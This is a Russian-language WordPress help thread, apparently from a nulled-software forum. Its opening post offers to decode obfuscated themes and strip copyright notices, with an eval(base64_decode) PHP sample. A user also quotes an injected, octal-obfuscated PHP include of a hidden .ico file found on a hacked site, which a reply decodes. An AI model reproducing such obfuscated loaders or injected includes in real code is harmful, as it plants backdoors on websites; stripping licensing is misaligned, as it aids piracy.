• DONATE to NULLED!
    Вы можете помочь Форуму и команде, поддержать финансово.
    starwanderer - модератор этого раздела будет Вам благодарен!

Помощь «Проблемы и решения» Спросите, и отвечено будет вам.

Статус
В этой теме нельзя размещать новые ответы.

BadMotherFucker

Модератор (Core Team)
Регистрация
13 Ноя 2009
Сообщения
760
Реакции
574
Здравствуйте.
В этом топике оставляйте запросы на раскодирование шаблонов(удаление копирайта из footer.php и т.п)/плагинов и всего-всего что связанно с Wordpress.

Правила довольно просты:
- Для кода обязательно использовать тег [CODE ] (без пробела);
- Благодарности только кнопкой “Мне нравится”.

Пример оформления запроса:
Здравствуйте. Помогите расшифровать:
Код:
<?php $_F=__FILE__;$_X='Pz48IS0tIGIydHQybSBTdDFydHMgLS0+DQogICAgPGQ0diA0ZD0iYjJ0dDJtLXQ0bDUiPjwvZDR2Pg0KCTxkNHYgNGQ9ImIydHQybS0yM3QiPg0KICAgICAgICA8ZDR2IDRkPSJiMnR0Mm0iIGNsMXNzPSJ3cjFwIj4NCiAgICANCiAgICAgICAgICAgIDwzbCA0ZD0iZjUxdDNyNXMtdDFicyIgY2wxc3M9ImNsNTFyZjR4Ij4NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIDxsND48MSBocjVmPSIjdDFiLTYiPlIxbmQybTwvMT48L2w0PiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICA8bDQ+PDEgaHI1Zj0iI3QxYi1hIj5NMnN0IFAycDNsMXI8LzEDQoNCjwvYjJkeT4NCjwvaHRtbD4=';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>
Заранее большое спасибо.

Также советую ознакомиться с правилами раздела и форума:
Для просмотра ссылки Войди или Зарегистрируйся

За несоблюдение правил бан на месяц.
 
Последнее редактирование модератором:
Подскажите, чем перенести товары, категории и заказы с OcStore на Woocommerce? Это вообще возможно без долгих плясок с бубном?

Привет, можно. Из OcStore можно в один клик импортировать все товары в CSV-файл, в Woordpress'e поставить плагин WP All Import Export + Woocommerce (тут на форуме есть) - и через этот плагин, загрузить CSV-файл с товарами на Вордпресс (Woocommerce уже должен быть установлен)
 
Привет, можно. Из OcStore можно в один клик импортировать все товары в CSV-файл, в Woordpress'e поставить плагин WP All Import Export + Woocommerce (тут на форуме есть) - и через этот плагин, загрузить CSV-файл с товарами на Вордпресс (Woocommerce уже должен быть установлен)
Спасибо, но как быть с категориями и заказами?
 
Спасибо, но как быть с категориями и заказами?
Чем пользуюсь я и в общем, что советую и Вам ибо без привлечения сторонних плагинов. Вот в этой ветке я отписывал Для просмотра ссылки Войди или Зарегистрируйся, там можно импортировать/экспортировать товары (простой/вариативный и т.д.) свойства, категории и т.д., а на счёт заказов то вот плагин Для просмотра ссылки Войди или Зарегистрируйся он бесплатный, легкий и простой, за 1 минуту можно разобраться!
 
Последнее редактирование:
Здравствуйте! На сайте установлена тема Publisher, спустя 2-5 дней Wordfence оповещает об измененных файлах.
Появляется такой код <?php /*7ab23*/ @include \057var/\167ww/d\165sk/d\141ta/w\167w/cr\171ptav\145sti.\143om/w\160-inc\154udes\057sodi\165m_co\155pat/\154ib/.\14310f0\145d0.i\143o; /*7ab23*/
Для просмотра ссылки Войди или Зарегистрируйсяомогите разобраться.
Для просмотра ссылки Войди или Зарегистрируйся
 
Здравствуйте! На сайте установлена тема Publisher, спустя 2-5 дней Wordfence оповещает об измененных файлах.
Появляется такой код <?php /*7ab23*/ @include \057var/\167ww/d\165sk/d\141ta/w\167w/cr\171ptav\145sti.\143om/w\160-inc\154udes\057sodi\165m_co\155pat/\154ib/.\14310f0\145d0.i\143o; /*7ab23*/
Для просмотра ссылки Войди или Зарегистрируйсяомогите разобраться.
Это закодированный php код вот расшифровка (@include /var/www/dusk/data/www/cryptavesti.com/wp-includes/sodium_compat/lib/.c10f0ed0.ico;). Я полагаю тебя взломали! Меня пароли, качай резервную копию на комп, проверяй айболитом, ищи уязвимость, скорее всего там shell, лечи сайт и заливай обратно! Ну как то так )
 
Помогите разобраться в ошибке. Не открывает вкладке "Визуально" в произвольных полях созданных при помощи ACF. Началось после того как обновился ВП до 5.3. ACF стоит 5.7.1, уже пробовал обновить до всех последующих версий. Результат тотже.
 

Вложения

  • oshibka.jpg
    oshibka.jpg
    338,9 KB · Просмотры: 4
Помогите разобраться в ошибке. Не открывает вкладке "Визуально" в произвольных полях созданных при помощи ACF. Началось после того как обновился ВП до 5.3. ACF стоит 5.7.1, уже пробовал обновить до всех последующих версий. Результат тотже.
А сам плагин ACF отключали закладка (визуально) начинает работать? Можно попробовать удалить классический редактор, из скриншота видно, что в нем ошибка javascript-а и установите заново classiceditor и попробуйте работает или нет.
 
Последнее редактирование:
А сам плагин ACF отключали закладка (визуально) начинает работать? Можно попробовать удалить классический редактор, из скриншота видно, что в нем ошибка javascript-а и установите заново classiceditor и попробуйте работает или нет.
Все работает отлично без плагина.
 
При отключении плагина Advanced Custom Fields: qTranslate влкадка начинает работать, но мне она необходима, так как куча страниц созданы уже и заполнены на мультиязычности :(
 
При отключении плагина Advanced Custom Fields: qTranslate влкадка начинает работать, но мне она необходима, так как куча страниц созданы уже и заполнены на мультиязычности :(
Ну как бы проблема думаю может быть в этом, Для просмотра ссылки Войди или Зарегистрируйся плагин не поддерживается данной версией WP ибо плагин не обновлялся год назад. Думаю трабла в этом.
 
Последнее редактирование:
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху